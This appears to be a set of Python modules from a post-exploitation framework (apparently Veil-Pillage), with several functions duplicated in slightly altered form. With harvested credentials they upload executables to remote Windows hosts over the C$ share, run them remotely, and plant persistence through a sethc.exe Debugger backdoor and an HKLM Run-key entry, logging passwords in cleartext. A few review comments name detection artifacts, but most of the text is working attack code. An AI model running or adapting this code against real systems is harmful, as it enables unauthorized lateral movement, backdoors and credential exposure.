def run(self):
    """Upload netview.exe to every target over SMB and start it remotely.

    Uses the first credential pair in self.creds and the trigger_method,
    out_file and args options. One status line per target is appended to
    self.output; nothing is returned.
    """
    # only the first credential pair is ever used
    username, password = self.creds[0]

    opts = self.required_options
    triggerMethod = opts["trigger_method"][0]
    out_file = opts["out_file"][0]
    args = opts["args"][0]

    # a bare file name is placed under C:\Windows\Temp\ ; a value that
    # already contains a backslash is passed through unchanged
    if "\\" not in out_file:
        out_file = "C:\\Windows\\Temp\\" + out_file

    # local copy of the binary that gets pushed to each host
    exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/netview.exe"

    # remote command line; the literal option value "none" means
    # "no extra arguments"
    cmd_parts = ["C:\\Windows\\Temp\\netview.exe -o " + out_file]
    if args != "none":
        cmd_parts.append(args)
    cmd = " ".join(cmd_parts)

    for target in self.targets:
        # stage the binary in C:\Windows\Temp\ through the C$ share
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)

        # launch it with the selected trigger method
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)

        # NOTE(review): the status line stores the password in cleartext, and
        # nothing in this method removes the uploaded binary or the output
        # file from the target.
        self.output += "".join([
            "[*] netview.exe uploaded and executed using creds '",
            username, ":", password,
            "' on ", target,
            " using ", triggerMethod, "\n",
        ])
def run(self):
    """Copy netview.exe to each target's Temp directory and execute it.

    The first entry of self.creds supplies the username and password.
    The out_file option names the file passed to "-o"; the args option
    carries extra arguments unless it is the literal string "none".
    A status line per target is appended to self.output.
    """
    remote_dir = "C:\\Windows\\Temp\\"

    # single credential set assumed
    username, password = self.creds[0]

    triggerMethod = self.required_options["trigger_method"][0]
    requested_out = self.required_options["out_file"][0]
    args = self.required_options["args"][0]

    # values containing a backslash are treated as full paths, anything
    # else is resolved relative to the remote Temp directory
    out_file = requested_out if "\\" in requested_out else remote_dir + requested_out

    exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/netview.exe"

    cmd = remote_dir + "netview.exe -o " + out_file
    if args != "none":
        cmd += " " + args

    for target in self.targets:
        # upload over the C$ share, then trigger the uploaded binary
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)

        # NOTE(review): credentials are written to self.output in cleartext;
        # the binary and its output file stay on the target after this call.
        cred_text = username + ":" + password
        self.output += ("[*] netview.exe uploaded and executed using creds '" + cred_text
                        + "' on " + target + " using " + triggerMethod + "\n")
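def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""):
    """
    Upload the executable at exePath to every host in targets and run it.

    targets may be a single host string or a list of hosts. The file is
    first copied locally under a randomized name, uploaded to
    C:\\Windows\\Temp\\ on each host with the given username/password, and
    then started with triggerMethod (default "wmis") and exeArgs.

    Returns the randomized file name so the caller can clean up later.
    """
    # function-scope import: the file's import block is not visible here
    import subprocess

    # accept a single target as well as a list (isinstance also covers
    # str subclasses, which the previous exact type comparison missed)
    if isinstance(targets, str):
        targets = [targets]

    # randomize the uploaded .exe file name
    uploadFileName = helpers.randomString() + ".exe"

    # Stage the payload under the random name. An argv list is used instead
    # of a shell string so a path containing spaces or shell metacharacters
    # is copied as-is rather than being re-parsed by /bin/sh on this host.
    # NOTE(review): the copy destination carries a leading "/" while the
    # upload below reads settings.TEMP_DIR without it; both resolve to the
    # same file only when TEMP_DIR is absolute - confirm against settings.
    subprocess.call(["cp", "--", exePath, "/" + settings.TEMP_DIR + "/" + uploadFileName])

    # command to trigger the uploaded executable
    cmd = "C:\\Windows\\Temp\\" + uploadFileName + " " + exeArgs

    for target in targets:
        # upload the binary to the host at C:\Windows\Temp\
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\",
                       settings.TEMP_DIR + "/" + uploadFileName, 5)

        # execute the trigger command
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)

    # hand the randomized name back in case the caller later wants to
    # clean up the file or its process
    return uploadFileName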
def run(self):
    """Run finddllhijack.exe on each target and store what it prints.

    The binary is uploaded to the target's Temp directory, executed with
    the configured trigger method, deleted again, and its output is saved
    through helpers.saveModuleFile. A status line per target is appended
    to self.output.
    """
    # single credential set assumed
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    local_exe = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
    remote_exe = "C:\\Windows\\Temp\\finddllhijack.exe"

    for target in self.targets:
        # stage the binary in C:\Windows\Temp\ through the C$ share
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", local_exe)

        # run it and collect whatever output comes back
        out = command_methods.executeResult(target, username, password,
                                            remote_exe, triggerMethod, pause=5)

        # remove the uploaded binary again
        command_methods.executeCommand(target, username, password,
                                       "del " + remote_exe, triggerMethod)

        # the result file is written even when the output is empty
        saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

        if out == "":
            self.output += "".join(["[!] FindDllHijack failed for ", target, " : no result file\n"])
        else:
            self.output += "".join(["[*] FindDllHijack results for ", target,
                                    " stored at ", saveFile, "\n"])
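def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""):
    """
    Upload the executable at exePath to every host in targets and run it.

    targets may be a single host string or a list of hosts. The file is
    first copied locally under a randomized name, uploaded to
    C:\\Windows\\Temp\\ on each host with the given username/password, and
    then started with triggerMethod (default "wmis") and exeArgs.

    Returns the randomized file name so the caller can clean up later.
    """
    # function-scope import: the file's import block is not visible here
    import subprocess

    # accept a single target as well as a list (isinstance also covers
    # str subclasses, which the previous exact type comparison missed)
    if isinstance(targets, str):
        targets = [targets]

    # randomize the uploaded .exe file name
    uploadFileName = helpers.randomString() + ".exe"

    # Stage the payload under the random name. An argv list is used instead
    # of a shell string so a path containing spaces or shell metacharacters
    # is copied as-is rather than being re-parsed by /bin/sh on this host.
    # NOTE(review): the copy destination carries a leading "/" while the
    # upload below reads settings.TEMP_DIR without it; both resolve to the
    # same file only when TEMP_DIR is absolute - confirm against settings.
    subprocess.call(["cp", "--", exePath, "/" + settings.TEMP_DIR + "/" + uploadFileName])

    # command to trigger the uploaded executable
    cmd = "C:\\Windows\\Temp\\" + uploadFileName + " " + exeArgs

    for target in targets:
        # upload the binary to the host at C:\Windows\Temp\
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\",
                       settings.TEMP_DIR + "/" + uploadFileName, 5)

        # execute the trigger command
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)

    # hand the randomized name back in case the caller later wants to
    # clean up the file or its process
    return uploadFileName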
def run(self):
    """Execute finddllhijack.exe on every target and keep its output.

    For each host in self.targets the binary is uploaded, run, deleted,
    and the captured output is handed to helpers.saveModuleFile. Success
    or failure is reported by appending a line to self.output.
    """
    remote_path = "C:\\Windows\\Temp\\finddllhijack.exe"

    # only the first credential pair is used
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
    delete_cmd = "del " + remote_path

    for target in self.targets:
        # upload, execute, then delete the binary on the target
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
        out = command_methods.executeResult(
            target, username, password, remote_path, triggerMethod, pause=5)
        command_methods.executeCommand(
            target, username, password, delete_cmd, triggerMethod)

        # saved unconditionally, so an empty result still produces a file
        saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

        got_output = out != ""
        if got_output:
            message = "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
        else:
            message = "[!] FindDllHijack failed for " + target + " : no result file\n"
        self.output += message
def run(self):
    """Upload an executable to each target and register it as the
    Image File Execution Options "Debugger" for sethc.exe.

    The executable is either generated through the Veil-Evasion controller
    (exe_path option equal to "veil", case-insensitive) or taken from the
    path given in exe_path. Returns "" early when no payload path is
    produced or the given path does not exist; otherwise status lines are
    appended to self.output and cleanup entries to self.cleanup.

    NOTE(review): block nesting was reconstructed from a flattened listing;
    confirm the indentation against the original file.
    """

    # assume single set of credentials
    username, password = self.creds[0]

    triggerMethod = self.required_options["trigger_method"][0]
    uploadName = self.required_options["upload_name"][0]

    # if we're using Veil-Evasion for payload generation
    if self.required_options["exe_path"][0].lower() == "veil":

        # create a Veil-Evasion controller object for payload generation
        con = controller.Controller()

        # check the various possible flags passed on the command line

        # if we don't have payload specified, jump to the main controller menu
        if not self.args.p:
            payloadPath = con.MainMenu()

        # otherwise, set all the appropriate payload options
        else:
            # pull out any required options from the command line and
            # build the proper dictionary so we can set the payload manually
            options = {}
            if self.args.c:
                options['required_options'] = {}
                for option in self.args.c:
                    # NOTE(review): the two-name unpack raises ValueError when
                    # an option has no "=" or its value contains another "="
                    name,value = option.split("=")
                    options['required_options'][name] = [value, ""]

            # pull out any msfvenom shellcode specification and msfvenom options
            if self.args.msfpayload:
                options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]

            # manually set the payload in the controller object
            con.SetPayload(self.args.p, options)

            # generate the payload code
            code = con.GeneratePayload()

            # grab the generated payload .exe name
            payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)

        # nicely print the title and module name again (since Veil-Evasion trashes this)
        messages.title()
        print " [*] Executing module: " + helpers.color(self.name) + "..."

        # sanity check if the user exited Veil-Evasion execution
        # (the second comparison is already covered by "not payloadPath")
        if not payloadPath or payloadPath == "":
            print helpers.color(" [!] No output from Veil-Evasion", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

    # if we have a custom-specified .exe, use that instead
    else:
        payloadPath = self.required_options["exe_path"][0]

        # if the .exe path doesn't exist, print an error and return
        if not os.path.exists(payloadPath):
            print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

    # make sure the name ends with ".exe"
    if not uploadName.endswith(".exe"):
        uploadName += ".exe"

    # copy the resulting binary into /tmp under the upload name
    # NOTE(review): the command is a concatenated shell string, so a path or
    # name containing spaces or shell metacharacters is re-parsed by the
    # local shell, and the copy's exit status is ignored. Nothing in this
    # method removes the /tmp copy afterwards.
    os.system("cp "+payloadPath+" /tmp/"+uploadName)

    for target in self.targets:

        baseName = payloadPath.split("/")[-1]

        # upload the payload to C:\Windows\ over the C$ share (the call
        # targets \Windows\, not System32)
        smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName)
        # NOTE(review): every status line below stores the password in cleartext
        self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n"

        # registry command that sets the IFEO Debugger value for sethc.exe
        # to the uploaded binary.
        # Detection: this leaves a "Debugger" value under
        # ...\Image File Execution Options\sethc.exe (MITRE ATT&CK T1546.008 /
        # T1546.012); registry auditing on that key and on new executables
        # written directly into C:\Windows\ covers both artifacts.
        sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\""

        # execute the registry command and get the result
        sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)

        # any non-empty result without the success text falls through
        # both branches and is not reported
        if sethcResult == "":
            self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "The operation completed successfully" in sethcResult:
            self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"

            # build our cleanup -> deleting the IFEO Debugger value.
            # The cleanup entry removes only the registry value; the binary
            # uploaded to C:\Windows\ is not covered by it. The entry also
            # embeds the password in cleartext.
            # NOTE(review): presumably recorded only on success - confirm nesting.
            cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self):
    """Upload an executable to each target and register it under the
    HKLM CurrentVersion Run key using the key_name option as value name.

    The executable is either generated through the Veil-Evasion controller
    (exe_path option equal to "veil", case-insensitive) or taken from the
    path given in exe_path. Returns "" early when no payload path is
    produced or the given path does not exist; otherwise status lines are
    appended to self.output and cleanup entries to self.cleanup.

    NOTE(review): block nesting was reconstructed from a flattened listing;
    confirm the indentation against the original file.
    """

    # assume single set of credentials
    username, password = self.creds[0]

    triggerMethod = self.required_options["trigger_method"][0]
    uploadName = self.required_options["upload_name"][0]
    key_name = self.required_options["key_name"][0]

    # if we're using Veil-Evasion for payload generation
    if self.required_options["exe_path"][0].lower() == "veil":

        # create a Veil-Evasion controller object for payload generation
        con = controller.Controller()

        # if we don't have payload specified, jump to the main controller menu
        if not self.args.p:
            payloadPath = con.MainMenu()

        # otherwise, set all the appropriate payload options
        else:
            # pull out any required options from the command line and
            # build the proper dictionary so we can set the payload manually
            options = {}
            if self.args.c:
                options['required_options'] = {}
                for option in self.args.c:
                    # NOTE(review): the two-name unpack raises ValueError when
                    # an option has no "=" or its value contains another "="
                    name, value = option.split("=")
                    options['required_options'][name] = [value, ""]

            # pull out any msfvenom shellcode specification and msfvenom options
            if self.args.msfpayload:
                options['msfvenom'] = [
                    self.args.msfpayload, self.args.msfoptions
                ]

            # manually set the payload in the controller object
            con.SetPayload(self.args.p, options)

            # generate the payload code
            code = con.GeneratePayload()

            # grab the generated payload .exe name
            payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)

        # nicely print the title and module name again (since Veil-Evasion trashes this)
        messages.title()
        print " [*] Executing module: " + helpers.color(self.name) + "..."

        # sanity check if the user exited Veil-Evasion execution
        # (the second comparison is already covered by "not payloadPath")
        if not payloadPath or payloadPath == "":
            print helpers.color(" [!] No output from Veil-Evasion", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

    # if we have a custom-specified .exe, use that instead
    else:
        payloadPath = self.required_options["exe_path"][0]

        # if the .exe path doesn't exist, print an error and return
        if not os.path.exists(payloadPath):
            print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

    # make sure the name ends with ".exe"
    if not uploadName.endswith(".exe"):
        uploadName += ".exe"

    # copy the resulting binary into /tmp under the upload name
    # NOTE(review): the command is a concatenated shell string, so a path or
    # name containing spaces or shell metacharacters is re-parsed by the
    # local shell, and the copy's exit status is ignored. Nothing in this
    # method removes the /tmp copy afterwards.
    os.system("cp " + payloadPath + " /tmp/" + uploadName)

    for target in self.targets:

        baseName = payloadPath.split("/")[-1]

        # upload the payload to C:\Windows\ over the C$ share (the call
        # targets \Windows\, not System32)
        smb.uploadFile(target, username, password, "C$", "\\Windows\\", "/tmp/" + uploadName)
        # NOTE(review): every status line below stores the password in cleartext
        self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"

        # registry command that adds a value named key_name under the HKLM
        # ...\CurrentVersion\Run key pointing at the uploaded binary (this is
        # a Run-key entry, not the sethc Debugger value the variable names
        # below still refer to).
        # NOTE(review): key_name is inserted unquoted after /v, so a name
        # containing spaces splits into separate REG arguments.
        # Detection: new values under HKLM ...\CurrentVersion\Run (MITRE
        # ATT&CK T1547.001) and new executables written directly into
        # C:\Windows\ are the artifacts this leaves.
        regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\""

        # execute the registry command and get the result
        sethcResult = command_methods.executeResult(
            target, username, password, regCommand, triggerMethod)

        # any non-empty result without the success text falls through
        # both branches and is not reported
        if sethcResult == "":
            self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "The operation completed successfully" in sethcResult:
            self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"

            # build our cleanup -> deleting this registry run value.
            # The cleanup entry removes only the registry value; the binary
            # uploaded to C:\Windows\ is not covered by it. The entry also
            # embeds the password in cleartext.
            # NOTE(review): presumably recorded only on success - confirm nesting.
            cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"